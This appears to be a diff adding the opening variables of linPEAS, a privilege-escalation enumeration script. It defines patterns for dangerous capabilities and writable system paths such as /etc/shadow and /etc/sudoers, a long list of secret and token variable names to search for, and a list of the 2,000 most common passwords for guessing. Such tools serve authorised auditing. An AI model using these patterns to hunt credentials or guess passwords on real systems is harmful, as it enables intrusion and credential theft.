+capsB="=ep|cap_chown|cap_dac_override|cap_dac_read_search|cap_setuid|sys_admin|sys_ptrace|sys_module" +containercapsB="sys_admin|sys_ptrace|sys_module|dac_read_search|dac_override" + +OLDPATH=$PATH +ADDPATH=":/usr/local/sbin\ + :/usr/local/bin\ + :/usr/sbin\ + :/usr/bin\ + :/sbin\ + :/bin" +spath=":$PATH" +for P in $ADDPATH; do + if [ ! -z "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi +done + +# test if sed supports -E or -r +E=E +echo | sed -${E} 's/o/a/' 2>/dev/null +if [ $? -ne 0 ] ; then + echo | sed -r 's/o/a/' 2>/dev/null + if [ $? -eq 0 ] ; then + E=r + else + echo "${Y}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}" + fi +fi + +writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$" +writeVB="/etc/anacrontab|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|"`echo $PATH 
2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g'` #Add Path but remove simple dot in PATH + +if [ "$MACPEAS" ]; then + sh_usrs="ImPoSSssSiBlEee" + nosh_usrs="ImPoSSssSiBlEee" + dscl . list /Users | while read uname; do + ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` + if [ "`grep \"$ushell\" /etc/shells`" ]; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi + done +else + sh_usrs=`cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed 's/|daemon|/|daemon[\\\s:]|^daemon$|/'`"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere + nosh_usrs=`cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/'`"ImPoSSssSiBlEee" +fi +knw_usrs='daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+' +USER=`whoami` +if [ ! 
"$HOME" ]; then + if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home + else HOME="/home/$USER"; + fi +fi +Groups="ImPoSSssSiBlEee"`groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|'` + +#This variables are dived in several different ones because NetBSD required it +pwd_inside_history="7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp|^ssh|steghide|@" +pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID" 
+pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID" 
+pwd_in_variables3="CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION" 
+pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId" 
+pwd_in_variables5="eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FIREBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER" 
+pwd_in_variables6="GOOGLE_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER" 
+pwd_in_variables7="MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NPM_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAIL|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET" 
+pwd_in_variables8="OKTA_OAUTH2_ISSUER|OMISE_KEY|OMISE_PKEY|OMISE_PUBKEY|OMISE_SKEY|ONESIGNAL_API_KEY|ONESIGNAL_USER_AUTH_KEY|OPENWHISK_KEY|OPEN_WHISK_KEY|OSSRH_PASS|OSSRH_SECRET|OSSRH_USER|OS_AUTH_URL|OS_PROJECT_NAME|OS_TENANT_ID|OS_TENANT_NAME|PAGERDUTY_APIKEY|PAGERDUTY_ESCALATION_POLICY_ID|PAGERDUTY_FROM_USER|PAGERDUTY_PRIORITY_ID|PAGERDUTY_SERVICE_ID|PANTHEON_SITE|PARSE_APP_ID|PARSE_JS_KEY|PAYPAL_CLIENT_ID|PAYPAL_CLIENT_SECRET|PERCY_TOKEN|PERSONAL_KEY|PERSONAL_SECRET|PG_DATABASE|PG_HOST|PLACES_APIKEY|PLACES_API_KEY|PLACES_APPID|PLACES_APPLICATION_ID|PLOTLY_APIKEY|POSTGRESQL_DB|POSTGRESQL_PASS|POSTGRES_ENV_POSTGRES_DB|POSTGRES_ENV_POSTGRES_USER|POSTGRES_PORT|PREBUILD_AUTH|PROD.ACCESS.KEY.ID|PROD.SECRET.KEY|PROD_BASE_URL_RUNSCOPE|PROJECT_CONFIG|PUBLISH_KEY|PUBLISH_SECRET|PUSHOVER_TOKEN|PUSHOVER_USER|PYPI_PASSOWRD|QUIP_TOKEN|RABBITMQ_SERVER_ADDR|REDISCLOUD_URL|REDIS_STUNNEL_URLS|REFRESH_TOKEN|RELEASE_GH_TOKEN|RELEASE_TOKEN|remoteUserToShareTravis|REPORTING_WEBDAV_URL|REPORTING_WEBDAV_USER|repoToken|REST_API_KEY|RINKEBY_PRIVATE_KEY|ROPSTEN_PRIVATE_KEY|route53_access_key_id|RTD_KEY_PASS|RTD_STORE_PASS|RUBYGEMS_AUTH_TOKEN|s3_access_key|S3_ACCESS_KEY_ID|S3_BUCKET_NAME_APP_LOGS|S3_BUCKET_NAME_ASSETS|S3_KEY" 
+pwd_in_variables9="S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_LOGS|S3_SECRET_ASSETS|S3_SECRET_KEY|S3_USER_ID|S3_USER_SECRET|SACLOUD_ACCESS_TOKEN|SACLOUD_ACCESS_TOKEN_SECRET|SACLOUD_API|SALESFORCE_BULK_TEST_SECURITY_TOKEN|SANDBOX_ACCESS_TOKEN|SANDBOX_AWS_ACCESS_KEY_ID|SANDBOX_AWS_SECRET_ACCESS_KEY|SANDBOX_LOCATION_ID|SAUCE_ACCESS_KEY|SECRETACCESSKEY|SECRETKEY|SECRET_0|SECRET_10|SECRET_11|SECRET_1|SECRET_2|SECRET_3|SECRET_4|SECRET_5|SECRET_6|SECRET_7|SECRET_8|SECRET_9|SECRET_KEY_BASE|SEGMENT_API_KEY|SELION_SELENIUM_SAUCELAB_GRID_CONFIG_FILE|SELION_SELENIUM_USE_SAUCELAB_GRID|SENDGRID|SENDGRID_API_KEY|SENDGRID_FROM_ADDRESS|SENDGRID_KEY|SENDGRID_USER|SENDWITHUS_KEY|SENTRY_AUTH_TOKEN|SERVICE_ACCOUNT_SECRET|SES_ACCESS_KEY|SES_SECRET_KEY|setDstAccessKey|setDstSecretKey|setSecretKey|SIGNING_KEY|SIGNING_KEY_SECRET|SIGNING_KEY_SID|SNOOWRAP_CLIENT_SECRET|SNOOWRAP_REDIRECT_URI|SNOOWRAP_REFRESH_TOKEN|SNOOWRAP_USER_AGENT|SNYK_API_TOKEN|SNYK_ORG_ID|SNYK_TOKEN|SOCRATA_APP_TOKEN|SOCRATA_USER|SONAR_ORGANIZATION_KEY|SONAR_PROJECT_KEY|SONAR_TOKEN|SONATYPE_GPG_KEY_NAME|SONATYPE_GPG_PASSPHRASE|SONATYPE_PASSSONATYPE_TOKEN_USER|SONATYPE_USER|SOUNDCLOUD_CLIENT_ID|SOUNDCLOUD_CLIENT_SECRET|SPACES_ACCESS_KEY_ID|SPACES_SECRET_ACCESS_KEY" 
+pwd_in_variables10="SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|VAULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS" 
+pwd_in_variables11="VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY" + +top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer 
rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston +snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker darkness cristina colorado boomer alexandra steelers serenity please montana 
mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar +stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 